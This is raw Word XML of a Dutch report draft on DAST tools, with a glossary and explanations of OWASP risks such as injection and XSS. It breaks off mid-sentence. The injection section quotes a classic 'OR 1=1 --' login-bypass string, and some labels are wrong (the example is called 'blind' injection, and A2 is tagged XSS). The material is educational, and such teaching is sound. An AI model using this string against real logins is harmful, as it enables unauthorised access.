      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00002D92">
        <w:t>Dynami</w:t>
      </w:r>
      <w:r w:rsidR="00103781">
        <w:t>c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00103781">
        <w:t xml:space="preserve"> Application Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00103781">
        <w:t>Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00103781">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00251012">
        <w:t xml:space="preserve">dit zijn security tools die zich specialiseren in het uitvoeren van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00251012">
        <w:t>Black</w:t>
      </w:r>
      <w:r w:rsidR="000A66B5">
        <w:t>box</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A66B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A66B5">
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A66B5">
        <w:t xml:space="preserve"> op </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000A66B5">
        <w:t>web applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000A66B5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46815110" w14:textId="3A2C351D" w:rsidR="000A66B5" w:rsidRDefault="000A66B5" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Crawl</w:t>
      </w:r>
      <w:r w:rsidRPr="000A66B5">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F22C65">
        <w:t xml:space="preserve">Bij een Crawl proces worden </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003C4605">
        <w:t>HTML pagina’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003C4605">
        <w:t xml:space="preserve"> doorzocht naar specifieke HTML DOM elementen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DD9966" w14:textId="4CFE6D61" w:rsidR="00C54597" w:rsidRDefault="00C54597" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r w:rsidR="00BC120E">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BC120E" w:rsidRPr="00BC120E">
        <w:t>Een CMS is het systeem achter een website dat het beheren hiervan eenvoudiger maakt. Zo kan iemand met relatief weinig technische kennis een website bouwen en beheren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4532E2" w14:textId="57B705E4" w:rsidR="00422628" w:rsidRPr="00582A37" w:rsidRDefault="00B934AB" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="0057377F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000F5212">
        <w:t>Een Application Programming Interface (API) is een verzameling van definities waarmee twee softwareapplicaties met elkaar kunnen communiceren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A29224D" w14:textId="2369EBFF" w:rsidR="00911E70" w:rsidRDefault="00911E70" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Unified</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Resource </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Locator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, een adres van website op het internet</w:t>
      </w:r>
      <w:r w:rsidR="0020140F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA9A16" w14:textId="318F6C41" w:rsidR="00911E70" w:rsidRDefault="00463978" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020140F">
        <w:t xml:space="preserve">Een gebruiker van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0020140F">
        <w:t>internet browser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0020140F">
        <w:t xml:space="preserve"> wordt verzonden van de huidige URL naar een andere URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7623A6AC" w14:textId="6638D28D" w:rsidR="00EF688B" w:rsidRPr="00422AA7" w:rsidRDefault="00422AA7" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
      <w:r w:rsidRPr="00422AA7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003825B4">
        <w:t xml:space="preserve">Een verzameling van code (Classes/functies) die door programmeurs online beschikbaar zijn gesteld e die andere programmeurs kunnen gebruiken bij het ontwikkelen van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003825B4">
        <w:t>software applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003825B4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B97266" w14:textId="2CF25C5E" w:rsidR="00573796" w:rsidRDefault="00573796" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DA5BED">
        <w:t>Gebruikersfunctionaliteiten</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> voor het uitvoeren van programmatische handelin</w:t>
      </w:r>
      <w:r w:rsidR="00D7605C">
        <w:t xml:space="preserve">gen in een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D7605C">
        <w:t>software applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D7605C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75232846" w14:textId="68CE4043" w:rsidR="008B4655" w:rsidRPr="00E8143C" w:rsidRDefault="008B4655" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8143C">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E8143C" w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E8143C">
        <w:t xml:space="preserve">Hyper </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E8143C">
        <w:t>Text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E8143C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E8143C">
        <w:t>Markup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E8143C">
        <w:t xml:space="preserve"> Language, een opmaak taal voor een website.</w:t>
      </w:r>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C7D50D" w14:textId="4B843A6F" w:rsidR="00A610CC" w:rsidRDefault="00A610CC" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BB360E">
        <w:t>Document Object Model, een HTML pagina is opgebouwd uit DOM elementen zoals de bekende &lt;p&gt;</w:t>
      </w:r>
      <w:r w:rsidR="006D5368">
        <w:t xml:space="preserve"> voor paragraaf element.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CAB91" w14:textId="2AC283FA" w:rsidR="008D4E4E" w:rsidRDefault="008D4E4E" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DBMS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: databasemanagementsystemen, applicatie waarmee </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQL databases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gemaakt kunnen worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC19031" w14:textId="034DC486" w:rsidR="009A7E14" w:rsidRPr="009A7E14" w:rsidRDefault="00422628" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005D61DD">
        <w:t xml:space="preserve">Een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005D61DD">
        <w:t>Endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005D61DD">
        <w:t xml:space="preserve"> is een apparaat</w:t>
      </w:r>
      <w:r w:rsidR="008657AE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008657AE">
        <w:t>software applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005D61DD">
        <w:t xml:space="preserve"> of netwerk node</w:t>
      </w:r>
      <w:r w:rsidR="008657AE">
        <w:t xml:space="preserve"> dat de eindpunt van de communicatie ket</w:t>
      </w:r>
      <w:r w:rsidR="00D21651">
        <w:t>en is.</w:t>
      </w:r>
      <w:r w:rsidR="005D61DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B73F367" w14:textId="0F1E36DA" w:rsidR="001E61CD" w:rsidRPr="00D30713" w:rsidRDefault="00AB602D" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Userstories</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E61CD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71520181" w14:textId="152AF1CF" w:rsidR="008C097F" w:rsidRDefault="00D30713" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30713">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>serpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="008C097F">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30713">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FAC497" w14:textId="1B91F1C7" w:rsidR="008C097F" w:rsidRPr="008C097F" w:rsidRDefault="00AB602D" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CRUD</w:t>
      </w:r>
      <w:r w:rsidR="008C097F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A53326" w14:textId="48F51D8F" w:rsidR="00351560" w:rsidRPr="00351560" w:rsidRDefault="008C097F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C097F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740AEC1D" w14:textId="7E7BCE9D" w:rsidR="00131314" w:rsidRDefault="00351560" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Autoload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B002B4C" w14:textId="6EB24ACD" w:rsidR="00F57BDD" w:rsidRPr="00006475" w:rsidRDefault="00131314" w:rsidP="004F287C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RobotTxt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008D4E4E" w:rsidRPr="00351560">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7126F3C8" w14:textId="7E632960" w:rsidR="001876C7" w:rsidRDefault="001876C7" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc491022101"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP Definities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="51D3F98C" w14:textId="7445C7D8" w:rsidR="004F287C" w:rsidRPr="009131FF" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009131FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009131FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C193DEF" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00C5361E" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:r>
        <w:t xml:space="preserve">Injecties zijn cyberaanvallen die ervoor zorgen dat er code met kwaadaardige bedoelingen van een applicatie door wordt verzonden naar een ander systeem. Deze aanvallen verrichten aanroepen (Calls) naar besturing systemen via systeem aanroepen, externe programma’s via shell commando’s, en ook aanroepen naar de backend systemen zoals databases, hier wordt vooral SQL voor gebruikt (SQL-injectie), [OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>flaws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 2017]. Webapplicaties maken veel gebruik van externe programma’s voor het uitvoeren van specifieke taken. Bij het gebruik van een externe applicatie worden </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uitgevoerd, indien deze niet goed opgevangen worden kunnen aanvallers kwaadaardige injecties sturen naar de externe applicaties, die op hun beurt het blind zullen uitvoeren. Er zijn verschillende types van injecties zoals LDAP, IMAP/SMTP, OS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>commanding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, maar SQL-injectie zijn de meest voorkomende en gevaarlijke vorm van injecties. Voor het uitvoeren van een SQL-injectie bouwt de hacker een SQL-query die mee wordt gegeven als parameter in een GET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, alleen is het geen normale SQL-query. De query is een toevoeging op een bestaande query. De toevoeging wordt normaal gesproken niet geaccepteerd maar als de hacker speciale karakters gebruikt zoals het aanhalingsteken of de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> teken die aan het eind van een query wordt toegevoegd, dan is het wel mogelijk. Om een voorbeeld te geven: “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SELECT ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>FROM ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=’OR 1=1”--. Dit is een simpel voorbeeld van een SQL-injectie van de type “Blind SQL Injecties”, wanneer dit gebruikt wordt bij het inloggen op een webapplicatie dan kan de hacker het inlogsysteem passeren omdat het resultaat van deze query altijd </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>WAAR</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zal zijn door de “OR 1=1” statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F69DE00" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00A60186" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A2 Broken Authentication and Session Management (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76A096" w14:textId="77777777" w:rsidR="004F287C" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:r w:rsidRPr="005822E8">
        <w:t xml:space="preserve">Authenticatie en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005822E8">
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005822E8">
        <w:t xml:space="preserve"> management hebben beide te maken met het managen van gebruikers en </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">het behouden van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>identity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van de gebruiker. </w:t>
      </w:r>
      <w:r w:rsidRPr="002D7438">
        <w:t xml:space="preserve">Authenticatie is het </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">proces </w:t>
      </w:r>
      <w:r w:rsidRPr="002D7438">
        <w:t xml:space="preserve">van bepalen of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de gebruiker echt is wie hij beweert dat hij is. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> management zoals de naam al suggereert gaat over het managen van actieve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sessions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Deze kwetsbaarheid kan ernaar toe leiden dat aanvallers onbevoegd toegang krijgen. </w:t>
      </w:r>
      <w:r w:rsidRPr="00587E15">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kwetsbaarheid uitleggen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB5443" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="0013587D" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013587D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A3 Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC69E7" w14:textId="77777777" w:rsidR="004F287C" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:r w:rsidRPr="00976655">
        <w:t xml:space="preserve">Cross site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00976655">
        <w:t>scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00976655">
        <w:t xml:space="preserve"> is een aanval waarbij kwaadaardige scripts </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">worden geïnjecteerd in een website. Dit gebeurt wanneer een hacker kwaadaardige </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>code(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">frontside script) verstuurd naar een eindgebruiker. De script taal die voornamelijk wordt gebruikt om </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>XSS aanvallen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> te verrichten is Javascript. Javascript wordt gebruikt om componenten op een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML websites</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> functioneel te maken. Deze kwetsbaarheid kan overal gebruikt worden waar de website input van de gebruiker gebruikt om functionaliteiten te verrichten. Er zijn honderden variatie van deze aanvallen en dat maakt het moeilijk om de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>XSS aanvallen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> op te vangen en uit te filteren. Om dit tegen te gaan zullen </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>website eigenaren</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> input moeten valideren tegen verwachte XSS patronen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D79B69" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00A60186" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Insecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Direct Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1871D27B" w14:textId="77777777" w:rsidR="004F287C" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:r w:rsidRPr="00660866">
        <w:t>Object referenties die niet goed beveiligd zijn tegen deze type aanval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">len kunnen grootte beveiligingsrisico’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00660866">
        <w:t>hebben voor de kostbar</w:t>
      </w:r>
      <w:r>
        <w:t>e data die een website waarborgt</w:t>
      </w:r>
      <w:r w:rsidRPr="00660866">
